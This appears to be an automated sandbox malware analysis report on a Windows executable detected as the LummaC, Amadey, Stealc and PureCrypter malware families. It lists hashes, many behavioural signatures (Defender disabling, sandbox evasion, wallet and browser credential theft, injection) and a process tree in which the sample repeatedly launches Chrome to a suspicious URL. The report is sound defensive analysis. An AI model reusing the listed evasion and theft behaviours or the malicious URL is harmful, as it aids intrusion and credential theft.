Edit tour

Windows Analysis Report
lIocM276SA.exe

Overview

General Information

Sample name:	lIocM276SA.exe renamed because original name is a hash value
Original sample name:	ed91fed1365af41a389141266378cfc8.exe
Analysis ID:	1550787
MD5:	ed91fed1365af41a389141266378cfc8
SHA1:	fdaa4dddc18c04adb903505acdd71d71eee8fc68
SHA256:	c399da828c92ddf5858f839b584084927f5576ab15f842f3acbd840a89df638a
Tags:	32exetrojan
Infos:

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, MicroClip, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected MicroClip

Yara detected Powershell download and execute

Yara detected Stealc

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Detected PureCrypter Trojan

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops VBS files to the startup folder

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: WScript or CScript Dropper

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to detect virtual machines (SMSW)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Detected suspicious crossdomain redirect

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

lIocM276SA.exe (PID: 2124 cmdline: "C:\Users\user\Desktop\lIocM276SA.exe" MD5: ED91FED1365AF41A389141266378CFC8)

skotes.exe (PID: 4948 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: ED91FED1365AF41A389141266378CFC8)

skotes.exe (PID: 2836 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: ED91FED1365AF41A389141266378CFC8)

skotes.exe (PID: 7856 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: ED91FED1365AF41A389141266378CFC8)

pohtent2.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe" MD5: CD97D09A95E215EFEE7A40605D6F734C)

cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 4820 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1916,i,2743930979166446243,11984125679060302953,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1896,i,12903140965514512258,7879093714222373490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2020,i,5642825108350335219,8833507162415557396,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,14015565629516230816,9755923701176644948,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,10036202946459383482,9416271039885435074,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1584,i,5243679326072088091,3788876514745600771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,10283285120756280865,5244641420518172917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8588 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,10757545353850069080,17528760924176413797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,5668110240625218180,2372566740740461637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1996,i,10628045244502770481,15461531275763280924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1988,i,1396496370233068950,16639235529074936853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=600 --field-trial-handle=1952,i,5853220489963610329,11725451507788123041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 10004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,4294371869201058628,10846258970923498441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 10064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 10524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1876,i,8933970381661588511,1818581820197100254,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 10856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2004,i,13216114064629241855,13841717341427345233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,10389912691377095377,17096823969531010843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11704 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1888,i,4051071628513783081,16709262364601523388,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1964,i,15873263108661751163,18258898578722931507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 12148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,6147241270899392023,4453104157303319847,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 12428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1952,i,7341651988098688960,14787193282515593003,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 11360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 12712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2000,i,4938578974072308078,5824721121082526347,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 12416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 13008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1964,i,17019434423062336247,7506196191360105004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 13164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1980,i,4588146245341811016,13786467013321908988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 13144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1032 --field-trial-handle=1972,i,17637373075668188386,10376262394289011974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 12464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 13552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1472,i,3006803207684737282,13482510552465898190,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 13392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 13816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,7370493582738384417,3969430867986938643,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1952,i,8612513622396932950,13356658119274073296,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 13824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2004,i,12612036452984945250,3418118297406578597,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1988,i,16593288603214495399,11730275540552871039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 15184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 15428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1968,i,3968838028028287844,15257303702526662038,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 16064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 16260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1976,i,11014613956716725374,17879268145922355351,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 16576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1992,i,7238726655923870739,5759593871076519028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 15868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

